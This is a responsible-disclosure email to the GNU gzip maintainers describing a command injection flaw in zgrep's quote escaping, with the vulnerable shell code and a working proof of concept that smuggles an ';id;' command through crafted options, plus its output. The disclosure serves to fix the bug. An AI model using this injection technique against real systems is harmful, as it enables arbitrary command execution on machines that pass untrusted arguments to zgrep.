Dear GNU gzip Maintainers,
I am writing to responsibly disclose an arbitrary command injection
vulnerability I have identified in the zgrep utility.
The vulnerability is caused by a logical flaw in how zgrep escapes single
quotes within command-line options. If an attacker controls the arguments
passed to zgrep, they can break out of the shell quoting mechanism and
execute arbitrary commands.
Root Cause Analysis
In the options parsing while loop, the script attempts to identify and
escape options containing single quotes so they can be safely evaluated by
the eval "$grep$args" statement at the end of the script.
The vulnerable block is as follows:
case $option in
(*\'?*)
option=\'$(printf '%s\n' "$option" | LC_ALL=C sed "$escape");;
(*)
option="'$option'";;
esac
If an option ends exactly with a single quote (e.g., --a='), the pattern
fails to match, and execution falls through to the default case (*), which
simply wraps the string in additional single quotes: option="'$option'".
This results in three single quotes ('--a=''), which unbalances the shell
quoting. An attacker can use two such options to completely break out of
the quoted string and inject shell metacharacters.
Proof of Concept
The following command demonstrates the injection. By supplying two
malicious options that end in single quotes, the space between them becomes
unquoted, allowing the ; separator and id command to be executed by eval.
*Command:*
code Bash
zgrep "--a='" "--b=;id;'" "pattern" file.gz
*Output:*
When executed, the shell evaluates grep '--a='' '--b=;id;''. The grep
command will fail due to the invalid arguments, but the injected id command
will execute successfully:
zgrep "--a='" "--b=;id;'" "pattern" file.gz
gzip: file.gz: No such file or directory
grep: --b=: invalid context length argument
uid=1000(sland) gid=1000(sland)
groups=1000(sland),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),100(users),115(libvirt)
/usr/bin/zgrep: 1: eval: : Permission denied
Thank you for your time and for your ongoing work maintaining gzip. Please
let me know if you need any additional clarification or testing regarding
this issue.
Best regards,
Leenear
